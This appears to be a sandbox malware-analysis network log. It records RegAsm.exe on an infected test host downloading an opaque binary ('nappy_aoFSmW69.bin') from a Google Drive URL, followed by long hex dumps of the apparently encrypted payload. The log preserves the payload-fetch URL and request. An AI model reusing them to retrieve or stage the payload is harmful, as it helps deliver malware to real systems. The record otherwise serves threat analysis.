                                                          Location: https://doc-0o-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub6bqdamuas6k5rune3dij162a/1633536225000/00014782062933200622/*/1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo?e=download
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Content-Security-Policy: script-src 'nonce-RudX0J1zQgtq2ZCwNJMDng' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: GSE
                                                          Set-Cookie: NID=511=j9AxXtuUq08tYdE4vTzTrFkPg3E796FjkEehN70ckVyinhwYj1haTsPFvfWtfhI4PxnK3zt6IB7MQYRwrAisY7eFFa72hcRfzVlgWO-GFtTw-PvDJYbwv2WKTQwFZZlSbePLfS1QONmLvCyp8-uw858PW-FGPt_vtAzvPFBWj58; expires=Thu, 07-Apr-2022 16:03:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2021-10-06 16:03:54 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 38 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 32 61 37
                                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a7
                                                          2021-10-06 16:03:54 UTC1INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.11.2049789142.250.185.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-06 16:03:54 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub6bqdamuas6k5rune3dij162a/1633536225000/00014782062933200622/*/1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo?e=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Cache-Control: no-cache
                                                          Host: doc-0o-88-docs.googleusercontent.com
                                                          Connection: Keep-Alive
                                                          2021-10-06 16:03:54 UTC2INHTTP/1.1 200 OK
                                                          X-GUploader-UploadID: ADPycdtVib5ztt-1Jk2Ge8TondcevC5R4hZwLPUAMgWmc9hhNsH-n5zd87PkelKhnEkXwg7220xAcnEwhWRZlscclXg
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: false
                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                          Access-Control-Allow-Methods: GET,OPTIONS
                                                          Content-Type: application/octet-stream
                                                          Content-Disposition: attachment;filename="nappy_aoFSmW69.bin";filename*=UTF-8''nappy_aoFSmW69.bin
                                                          Date: Wed, 06 Oct 2021 16:03:54 GMT
                                                          Expires: Wed, 06 Oct 2021 16:03:54 GMT
                                                          Cache-Control: private, max-age=0
                                                          X-Goog-Hash: crc32c=U10sIw==
                                                          Content-Length: 221760
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Connection: close
                                                          2021-10-06 16:03:54 UTC5INData Raw: db d0 95 4f ff e4 4d db e9 1c ba ce 70 aa 4f cd bd e8 b1 b3 18 24 bf 58 13 e2 37 fe c4 5b 73 2a 93 98 81 c9 47 ae 07 5c 16 24 75 7c 9a bb 94 ef 60 c8 30 26 0a d2 2b 6f f1 99 3d 1d ea 47 46 68 86 01 c0 2e 54 bb da c6 e2 f7 69 23 49 e1 ad 92 ae eb 1d fc bd 3e 08 65 b5 d5 cb 40 cb 4e 6d 4b ae 84 25 2e 6a bd b1 1e d3 5b bc bc 81 be bc 64 72 2d 96 fa 5c a8 91 b8 3f b9 2e 99 b0 37 7c 5c a9 c3 8f b8 b9 5c 3b 90 7a fa 7a 34 a8 ae ff 12 72 32 2f 57 d4 fd 24 fa a9 99 6d 5d 42 61 e1 5f e2 69 72 2c 45 79 42 8b 09 2d e2 14 98 7a a4 84 47 36 2a bc 58 24 25 0a 3a 23 ac c7 64 8b de ba d5 4c 4e 2d ed 63 48 61 c3 aa 66 58 f8 2e 98 6a 5a 9b cd 48 b0 2f 20 c5 36 3e 32 db 9b 7b c6 4f 89 81 5f e5 cc 83 6d 02 47 48 c7 20 bd fa 0e f0 85 87 d4 ff e2 60 f1 52 6c 61 99 2d ae 3f 63
                                                          Data Ascii: OMpO$X7[s*G\$u|`0&+o=GFh.Ti#I>e@NmK%.j[dr-\?.7|\\;zz4r2/W$m]Ba_ir,EyB-zG6*X$%:#dLN-cHafX.jZH/ 6>2{O_mGH `Rla-?c
                                                          2021-10-06 16:03:54 UTC9INData Raw: 87 53 20 f0 89 c1 6c 29 63 29 63 ff 7c 9b f6 bb 51 c6 3a 4c f8 ce 39 be 27 07 86 85 3d 59 b4 4b 19 9e f4 ad dd 8c 5f a0 ee 1b 50 f9 c0 d1 de cf b3 e1 33 bf 5d f3 0e be 0c 8a 3a ff fc b0 a1 69 7d 0a 56 8b b3 67 09 b9 b8 cf 9a 14 c0 be b8 99 ba b6 43 6b 37 52 64 80 a3 6f eb b1 bb 63 a2 56 0b b2 f6 6d 7a 65 af fb a5 b7 73 ff a3 cf 94 2b f7 4e 21 b5 74 65 de e6 5b 20 38 f8 84 26 87 d0 a6 03 03 75 49 a6 ba bd 7a 74 3f 15 fe 96 b0 46 ff d2 59 38 b0 ca 23 a6 5c 73 1e fe cc c8 9d 67 3e 19 e0 09 ee e8 f5 6f b3 cc af 9a d9 1a 1f e5 c2 c3 62 f3 60 09 8e 76 99 c2 d8 69 31 e6 c3 55 92 8f 07 99 ca 0d 5a 02 88 df ff c9 9d a2 9a f0 85 61 49 0d 8c 3c d2 e7 d0 93 47 89 c3 f6 3b 4a 3c 89 42 cf cf c2 db 46 ba 1a 31 2a 4d ae 61 80 ef 54 5c 7f 8b dc 38 30 96 41 7f 30 04 60 53
                                                          Data Ascii: S l)c)c|Q:L9'=YK_P3]:i}VgCk7RdocVmzes+N!te[ 8&uIzt?FY8#\sg>ob`vi1UZaI<G;J<BF1*MaT\80A0`S
                                                          2021-10-06 16:03:54 UTC13INData Raw: 2d 1a f9 59 91 f3 02 ea e9 8f 47 04 d7 6d 5a dd d6 2d df dc 51 70 64 fa 7e 45 b6 0b eb ac 83 dc 24 f6 9f e2 7f 66 69 8c a8 b1 04 a2 6f 43 82 41 55 42 10 79 b0 55 7c c9 cb ef 95 5c 92 4e f2 95 6b ff 9e 01 0a 18 8d 5a 56 3f 18 df 24 77 c9 af 45 ba 21 e3 9d e2 47 7f a0 a5 d3 36 f4 11 fc 21 1b a7 2b 3b e2 12 0b fe 2f 36 85 68 7d a5 4a ac f5 81 4b 1b cd 64 88 ce 9d 1b 14 09 74 49 5d fe e4 72 a6 00 96 6a d2 f4 3d 7c ad 8e c6 1a 52 4f 0c 0e 97 e1 e6 5d 70 7d 2d af 4a 39 a5 a4 64 c4 b9 6f f1 44 29 a7 49 bf 5f c4 ed e0 a9 12 cc 44 00 6b 1f b4 4b d8 0c f3 bc c3 00 fc f3 f2 c6 38 eb 00 4f 1d f0 83 8a 2e aa b2 55 00 3c bb 01 fc c5 ce 69 2f 70 fa 19 a0 0f 07 2c 65 17 60 29 bb 2c b5 6b 70 d0 e9 e4 dc e0 4e 02 c8 b5 51 dd bb bd 18 de 0a 7a 2f 0f f0 85 66 9e b4 c7 8d 7b
                                                          Data Ascii: -YGmZ-Qpd~E$fioCAUByU|\NkZV?$wE!G6!+;/6h}JKdtI]rj=|RO]p}-J9doD)I_DkK8O.U<i/p,e`),kpNQz/f{
                                                          2021-10-06 16:03:54 UTC16INData Raw: c1 5e a7 da 24 90 91 56 30 5d 5d 6a 5c 78 65 85 83 24 1b 41 09 34 8f ba fe 8a c8 f2 5c 18 0b b0 8d 30 90 61 37 49 65 01 1f bb 29 44 8a 27 f7 1d 4a a6 2a 5f 5f ff 5e e9 2a 00 18 0b 8b c7 64 81 f6 e4 85 09 48 3e 8b 4a f6 63 29 b9 3c 1f d0 7c 9a 6a 5c b3 ea 48 50 25 0a 9a 3d 3f 3f c8 be 0b 04 4d 89 8f 53 f4 eb 90 64 13 22 34 d5 0a ae dc 1f f9 ea 4e d4 ff e8 77 4f 50 64 2e 50 2d ae 37 74 b5 aa e0 4e f0 21 1b fa 02 1d a9 a4 3b 54 ca 8f 81 c5 92 19 72 9b 62 5a 6a 7d f9 ce a5 89 ea 3f 53 c3 22 02 51 90 f2 dc 24 43 15 3e 71 21 f4 14 79 56 6e cf 90 85 46 8b ff 02 c0 e2 1b 89 25 2c af db 73 ff 27 64 96 13 3c d5 44 b0 39 2f 6b 0b b4 f9 6d 99 b1 ca 51 c6 3a fd ec 9f 2b 9c 3d 35 8f af 2a 59 f3 d8 1b 9e f8 59 24 86 57 86 4a 02 7f b6 e8 15 d6 13 9d c9 19 29 5b f9 da 84
                                                          Data Ascii: ^$V0]]j\xe$A4\0a7Ie)D'J*__^*dH>Jc)<|j\HP%=??MSd"4NwOPd.P-7tN!;TrbZj}?S"Q$C>q!yVnF%,s'd<D9/kmQ:+=5*YY$WJ)[
                                                          2021-10-06 16:03:54 UTC18INData Raw: c0 36 a1 e2 83 48 b5 16 da e3 fa 41 6e a3 68 1e 23 e7 1f d4 14 1f b8 2b d1 f5 16 35 f7 32 18 85 b5 47 ae e8 b3 db ba 78 1b dc 6a 8d 0d 88 24 10 36 5f 4d 5d e5 3d 48 bf fe 97 38 de df 38 40 5d 33 a5 e5 55 31 0e 83 82 e5 ce 78 63 3d 36 c5 4f 21 68 a6 6c c3 1b 7e b9 53 57 a1 5f b4 70 f7 a8 e5 be ea e5 3f 00 73 12 db 34 ce f2 f8 32 d0 57 ef db ad dc c6 ec 8e 5c 76 eb 80 10 06 df ba 46 44 2c d1 e4 ea c5 c4 45 71 08 fa 1f 82 36 16 6c 75 20 0c a7 e4 2a 17 7b 18 63 92 e4 d6 f5 6c e9 95 b5 57 f4 bb 26 18 d8 11 55 37 df f0 83 44 2d 64 c5 87 55 9a e4 1e b4 c6 21 bb d6 cb 51 78 46 55 bb dc ee 9a f7 69 29 9e 30 ad 92 10 36 90 fc bd 3e 20 52 f5 d5 c1 54 d8 49 45 73 ae 84 2f f0 14 c3 bf 1e d3 5f a5 8f f7 96 2b 64 72 27 be d2 5c a8 97 a9 38 d6 fc 99 30 3d 54 78 a7 dc 3f
                                                          Data Ascii: 6HAnh#+52Gxj$6_M]=H88@]3U1xc=6O!hl~SW_p?s42W\vFD,Eq6lu *{clW&U7D-dU!QxFUi)06> RTIEs/_+dr'\80=Tx?
                                                          2021-10-06 16:03:54 UTC19INData Raw: 39 27 63 23 70 95 64 9f 99 e1 51 c6 30 45 fd df 3d b4 f9 37 8f d3 32 50 db 12 19 9e fe f9 0a 86 57 83 e8 13 3f b4 c0 d1 d5 13 9b cf 31 28 52 f9 d0 a2 24 bd 3a 5a ff 98 8f 67 7d 0c 5c b9 8b 67 08 b3 66 cf 9c 8f c9 be b8 96 92 b6 43 d6 3e 2b 64 99 2c 6f e1 ab bb 63 a3 54 0b eb f6 e1 e8 65 a5 f5 a5 b7 73 23 aa cf 94 89 5a 4e 33 b5 74 65 de fd 6b 25 38 04 8c 26 87 cb a6 03 12 8e 68 ef ba b2 70 00 0c 0f fe 97 bb 40 d7 98 59 30 b0 a5 68 a8 5c 79 18 ff a9 84 9d 68 34 1f c0 33 a0 e8 f4 00 fe cc af b5 d5 0d 70 a5 c2 c3 68 c6 75 3b e1 36 99 c2 d2 75 19 aa c0 55 94 e0 57 db c0 07 5c 24 c5 dd ff 9f f8 f3 9a ff 8f 67 26 45 8c 3c d9 ec d7 e7 7d d6 c9 f7 54 17 3c 89 48 8a 8b c0 db 4f ac 32 1f 30 4d a4 76 c0 64 54 5c 03 86 b3 6c 3e 96 4b 73 bd 61 38 53 69 fe 3f 29 4b c9
                                                          Data Ascii: 9'c#pdQ0E=72PW?1(R$:Zg}\gfC>+d,ocTes#ZN3tek%8&hp@Y0h\yh43phu;6uUW\$g&E<}T<HO20MvdT\l>Ksa8Si?)K
                                                          2021-10-06 16:03:54 UTC20INData Raw: 14 46 6e 76 01 9a aa ce ea 08 bd e5 ce 6a 40 7f 27 19 59 09 a7 83 6c c5 a8 79 ea 40 11 36 5f b4 74 df fc e3 a5 12 cc 44 05 7a 1c 2e 47 d2 e1 f6 90 d0 13 ea 0d f4 f2 c3 fd 06 53 25 f6 a8 78 02 c8 4e 54 2a 3d 8b 89 f8 c5 d5 45 45 8c fb 33 99 93 68 41 6f 08 60 a7 8b dc b5 6a 52 67 a1 f9 c5 fb 44 9f 93 ad af dd bf 2f 30 ed 00 52 52 00 e9 90 4a 05 a5 c3 9d ad b3 e6 19 9f ee 55 d0 d2 cb 4a 54 37 a9 ba f6 c3 f0 fb 73 30 b2 1e bc 96 00 15 1c d0 be 29 1b 61 f5 c4 cf 5e 35 4f 41 49 85 81 1d 55 95 42 4e 16 c4 8d b0 b4 88 30 0b 5b 04 d2 69 05 4a 82 8a 88 3b b9 a9 9b 30 37 54 5c a7 cd 1d 6f bb e8 34 57 28 9c 7a 78 63 9c ac 04 01 41 0f 23 8a c3 52 8f b6 ef 4d 3e 27 60 6f 31 96 4f 06 b7 64 75 2c e5 29 40 9a ca dd 55 db 94 3b 5e 21 38 77 29 2e 11 19 4c 4f c6 64 8d cf bd
                                                          Data Ascii: Fnvj@'Yly@6_tDz.GS%xNT*=EE3hAo`jRgD/0RRJUJT7s0)a^5OAIUBN0[iJ;07T\o4W(zxcA#RM>'`o1Odu,)@U;^!8w).LOd
                                                          2021-10-06 16:03:54 UTC22INData Raw: aa 87 67 01 ac 68 31 9d 12 cb b9 a1 e6 8a b6 43 6d 95 34 6b 9a 2c 67 fe bb 45 62 8e 5e 17 66 e3 2f e1 64 ae e4 ae bb 73 f7 bc df 6a 87 76 45 34 b4 0a 7c df fd 6f 87 27 fe 89 26 8f da aa fd 13 5b 6a e8 ad c3 69 00 0c 11 5c 88 b7 4c d7 90 4f c6 bb 89 6a b1 50 79 10 f6 b1 7a 9c 4b 36 34 c5 11 d3 16 0a ff d4 cc af 90 c4 3d 74 ab 09 c3 68 f5 55 3b e1 28 9b ea 2d 6f 19 a0 ae 61 94 e0 5d f6 ff 07 5c 20 cf 00 4c cf f2 f3 bf d8 b8 67 26 55 80 3e f0 13 d7 e7 77 9a c7 d7 54 1d 3c 89 c5 9c 81 c0 da 4d 7c 4e 1f 2a 4c 8c 63 c0 64 5e 74 7f 8d b3 66 39 18 fc ab 8f 78 3d 45 6d ef 3b 46 50 c8 30 f2 db 65 6b ee 0b 45 a1 d7 20 db 99 e8 0a 79 2c 3d b4 3a 3a f6 49 ec f2 59 47 29 2c 09 f8 f4 a3 b0 e7 09 82 65 1d 17 05 a3 2a 4c a8 3a 98 09 04 63 29 27 91 2d ad 2e 08 8b 46 3b e2
                                                          Data Ascii: gh1Cm4k,gEb^f/dsjvE4|o'&[ji\LOjPyzK64=thU;(-oa]\ Lg&U>wT<M|N*Lcd^tf9x=Em;FP0ekE y,=::IYG),e*L:c)'-.F;
                                                          2021-10-06 16:03:54 UTC23INData Raw: 1f 7e dc d2 bc 4f 15 3a 93 8b f8 d2 3a 40 75 71 e2 0c 8c 94 16 28 75 f6 6b 89 e1 07 f1 71 4b 4f e9 f5 d2 e4 ba 8f bb ae 57 b3 94 27 18 d4 7e 77 58 0d f4 8b d4 13 9c e9 87 53 b8 dc e2 b5 ec 53 df c5 cf 5b 41 2a 41 45 db ea e5 e0 7a 27 b6 0f a9 8f e8 ea 31 fe 96 3b 30 09 0a 2a 34 48 dc 98 61 43 a7 b5 e6 38 40 bd b1 05 e3 5f bc 3f 86 be bc 4b 72 2d 87 d2 14 a8 91 be bf 99 2e 99 34 49 58 5c a7 d8 19 88 c7 cb 32 5d 5f 55 48 60 1b aa ab 7a 1f cf b8 31 97 be 6b c2 c8 f4 4b 13 26 d2 dc 37 96 49 3b 57 1b 28 37 e5 2d 5c bf 22 a2 10 f7 a4 2e d7 f9 cf 47 25 00 4b 1e 23 aa ea 61 56 ed bd 85 09 66 64 a1 62 4d 63 37 ff c6 39 f8 2e e6 67 5a 9b c9 60 bf 2d 22 c2 15 7f 39 db 91 10 dc 31 81 89 5f e1 e4 73 6f 02 0f 16 e0 20 bd d0 8e f8 85 87 d0 22 1f 66 b1 52 12 49 99 2d aa
                                                          Data Ascii: ~O::@uq(ukqKOW'~wXSS[A*AEz'1;0*4HaC8@_?Kr-.4IX\2]_UH`z1kK&7I;W(7-\".G%K#aVfdbMc79.gZ`-"91_so "fRI-
                                                          2021-10-06 16:03:54 UTC24INData Raw: a5 03 14 5f 45 ef ba b7 f0 08 0c 15 fa 4a 77 42 d7 98 5b 27 c3 96 71 d8 54 79 18 ed 8b 89 9e 67 32 37 e4 29 a0 e2 75 08 fe cc ab 4d 70 0f 70 ab c0 dc 12 c6 66 45 e9 39 99 c6 fa 61 1a aa c7 7d b0 e0 57 93 4a 0f 5c 2a c1 00 6e cd f2 f3 98 ef f4 54 3f 21 84 3c d8 e8 ff e8 7e 89 c5 df 70 19 3c 83 c8 ef 81 c0 df 9d df 30 1f 2a 4f bb 57 f3 7d 2a 54 7f 8c b7 44 6a 94 4b 75 1f 4f 38 53 6c 7e 37 29 51 cd ed ad d0 74 6e d4 0e 6d e0 d1 4f d4 be ef 76 7a f7 40 b4 30 13 da 5d ec f4 3c 66 28 2d 03 9d 92 f9 98 7c 1f 7c 6e f5 06 1c a7 c5 4b ad cd 8a 51 2d 78 ad 27 95 2d 53 5c 1c 74 47 6e f3 13 43 5e 43 18 07 5e af 77 03 b5 cf 47 5e 9b ac 6d 4b d8 a1 df df f0 50 00 71 76 6b 4f 9e 1a e5 b5 96 b7 b9 e7 9b f3 ad 72 47 0b de a9 7a bb 00 4f 87 e3 43 d1 33 79 a1 55 be 1f 34 ee
                                                          Data Ascii: _EJwB['qTyg27)uMppfE9a}WJ\*nT?!<~p<0*OW}*TDjKuO8Sl~7)QtnmOvz@0]<f(-||nKQ-x'-S\tGnC^C^wG^mKPqvkOrGzOC3yU4
                                                          2021-10-06 16:03:54 UTC25INData Raw: 62 d3 45 dc e6 d8 40 50 3f 4c a4 fe 38 e7 db 7d 0b a2 1f ad 98 14 fa 16 ed b9 51 1d 64 f5 df c6 5f ee 5d 76 4b bf 9f 3a 21 94 bc 9d 14 c2 50 a2 6a 92 b5 a3 74 61 36 96 eb 47 b7 86 46 3e 95 24 88 3b 2d aa 4f ac c3 2d a5 a2 e8 23 46 41 bc 7a 54 6c 9e a0 60 cd 52 04 3c b5 89 43 99 d3 eb 5b c0 22 23 81 32 87 42 38 5a 64 0b 3d f6 3b 5b 9b 27 c7 35 e6 bf 35 49 b0 d8 5a 27 2a 11 15 0b bf c6 64 81 cd ac 9a 18 5d 36 a1 73 50 7e 30 41 2c 15 f2 3f 93 70 8c 88 c6 57 4a 3c 39 c4 2c 24 26 f1 65 22 e9 41 8b 98 54 cd dd 82 6d 08 1a 26 db 0b ae c1 0e e1 9e 98 c1 01 e3 4c bb 43 67 5b 4f 3e a5 22 75 58 b3 80 59 84 f7 12 04 09 26 59 a4 75 4e e4 f3 49 c5 98 00 74 7a 6a 16 48 4b e9 d5 ba e8 1a 3e 7f cd 5f 21 89 44 e1 d1 13 a9 06 25 7b 70 64 0b 5a a8 7e e6 b2 ff 4f 91 2f 39 08
                                                          Data Ascii: bE@P?L8}Qd_]vK:!Pjta6GF>$;-O-#FAzTl`R<C["#2B8Zd=;['55IZ'*d]6sP~0A,?pWJ<9,$&e"ATm&LCg[O>"uXY&YuNItzjHK>_!D%{pdZ~O/9
                                                          2021-10-06 16:03:54 UTC27INData Raw: ab c1 5f 98 f1 58 83 1c 14 53 28 d4 d2 d7 de f3 f3 90 fd 9e 68 3c 89 9f 33 da fd d8 cf 6c 88 c3 fd 47 14 2d 86 52 f6 8c 16 0d 53 a3 30 0e 25 65 b5 76 c0 6e 47 59 6e 83 a9 ba 23 99 5a 76 20 b1 2f 85 eb d5 3f 29 50 da 34 fa c3 7b 7f f8 1c 7c e5 ff 36 dc bf e5 7f 04 f0 2e a8 3b 3b d4 64 c0 f3 53 6f 21 0d 07 72 98 f8 d8 e9 09 82 6f a9 15 0f da 26 4b bb 39 e4 10 2e 58 03 0f c7 2d ad 5b 19 9e 57 25 e0 23 ee 76 13 18 f9 59 aa 9b 05 86 c0 2d 5c 17 d3 6d 4b f9 8e 88 fd f0 5a 6f 76 77 6b b5 89 53 ce 24 90 d8 2e 50 8c 2f 0c 4c 45 87 a0 ba 69 ab 7d 52 95 e4 25 72 14 79 a1 51 63 c0 15 ae e2 78 84 53 da ef 41 df 99 a3 1f 16 b6 49 55 2e 1a af 29 88 c8 89 64 a1 2f f6 f2 e9 41 67 8c 56 cc 23 e1 06 fb ed b5 b8 21 c5 f2 3a 16 e4 34 07 8b 39 7d af ee a0 f9 4f d7 1b dc 60 b6
                                                          Data Ascii: _XS(h<3lG-RS0%evnGYn#Zv /?)P4{|6.;;dSo!ro&K9.X-[W%#vY-\mKZovwkS$.P/LEi}R%ryQcxSAIU.)d/AgV#!:49}O`
                                                          2021-10-06 16:03:54 UTC28INData Raw: 35 ae a2 a6 30 37 7d 74 0c dc 35 bc 91 b2 32 5d 51 55 ad f5 4e 8f ab 7b 08 46 1e 21 b2 ba 5a 8b c8 f2 55 b3 24 0f 8f 31 85 42 01 42 73 1a 30 47 38 4f 9b 22 50 0a f7 a4 2b fb 5f d2 65 25 39 0c 0a 37 b4 4a 4b 8b de bb 96 04 5f 20 b7 75 d7 70 24 a8 3b a5 e9 23 8f 42 fd 9b cd 42 76 3e 2f d2 ad 13 26 ca 97 35 5f 67 98 89 5f ef 1c 91 6d 02 12 16 d0 20 bd d0 26 c4 84 87 de 8b f0 60 b1 49 7f 46 88 2a bf 3a ed fc b0 5a 5e 03 9b 3e fb 08 00 44 ae 75 4d d8 c8 52 c6 92 15 72 e8 67 05 53 4a eb c2 b4 fb f2 2e 56 ef 5f 2a 93 98 50 cb 00 9a 1e 2f 70 75 6b 03 f4 79 7f ca b9 fd 49 9a f4 3c 14 7c 0a 82 17 02 ba db 79 ef 39 32 17 7f 21 ec 8b a4 a3 01 72 23 70 f1 7e 9a ed ff 51 c6 2b 52 23 d3 2d bc d5 30 9e a1 54 07 db 1c 13 42 f7 60 04 ae 02 8c e8 15 34 a7 b3 f2 d5 13 91 dc
                                                          Data Ascii: 507}t52]QUN{F!ZU$1BBs0G8O"P+_e%97JK_ up$;#BBv>/&5_g_m &`IF*:Z^>DuMRrgSJ.V_*P/pukyI<|y92!r#p~Q+R#-0TB`4
                                                          2021-10-06 16:03:54 UTC29INData Raw: 72 37 61 29 71 77 dd 50 01 50 c9 3a e9 f0 63 01 d5 0b 6d ea c6 02 c4 d0 c5 7d 15 f6 50 96 55 10 df 5d e6 e3 57 79 38 29 87 45 f7 d4 99 76 03 91 4a b5 44 8e 9e 3b 4a ba 20 aa 1f 0a 47 21 36 b4 3b b2 1d 22 9c 47 31 fb 40 c3 5f 43 12 ea 79 a8 af 13 cb 8c 0f 5d 17 d9 7e 6c c8 e9 fb cc f1 5a 65 5e 20 69 45 b0 22 c8 b7 90 de 4b 9f 9b f9 8b 74 6d 80 b0 af 6b 92 00 79 87 e3 43 8f 18 68 87 7d 64 d1 13 81 ee 50 9b 58 06 e2 63 21 81 a4 1f cc 8b 59 5c f0 0d e5 18 be c8 83 42 a0 17 da db fa 47 75 7a 07 cb 09 e1 3f bd 4c 1f b8 23 c5 e3 3e b3 f7 32 1e 82 68 7d af 3d b3 fe 92 5e 1b dc 60 9e 30 9c 37 15 1e 67 4d aa ef e0 6d 9f fe 97 46 c8 de 38 44 54 73 39 e5 55 31 15 0e 95 e5 ce 79 77 7f 27 85 ac 09 a7 a4 90 c7 b9 6f f5 44 29 b6 5f b4 74 df ef e7 be ec 67 6b 02 73 3b b4
                                                          Data Ascii: r7a)qwPP:cm}PU]Wy8)EvJD;J G!6;"G1@_Cy]~lZe^ iE"KtmkyCh}dPXc!Y\BGuz?L#>2h}=^`07gMmF8DTs9U1yw'oD)_tgks;
